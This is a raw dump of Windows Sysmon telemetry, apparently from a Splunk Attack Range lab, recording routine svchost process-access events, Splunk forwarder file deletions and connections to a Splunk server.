
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:13.437{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB469CF66E84188B5491CF10A8F31883,SHA256=9E6D66A4E20D3B59424D30940F139CD1ACEF61AC74970269831760ACE656A81E,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000808252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:12.377{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57316-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:13.541{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8511433C4A224A4A4A4106FC0E79BAC,SHA256=07A271F27027283E6903D775027DD6875F5BE41C6417A4F332992685DB3562F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.708{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51082-false10.0.1.12-8000- 23542300x80000000000000001050385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:14.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F7E7DF15F45AB35F547C29C2C3AA0B,SHA256=C36310D52EDBCD54962CDFD247AE1964FF883E43FFF88BEF6D06C6BDAE0D83F2,IMPHASH=00000000000000000000000000000000falsetrue 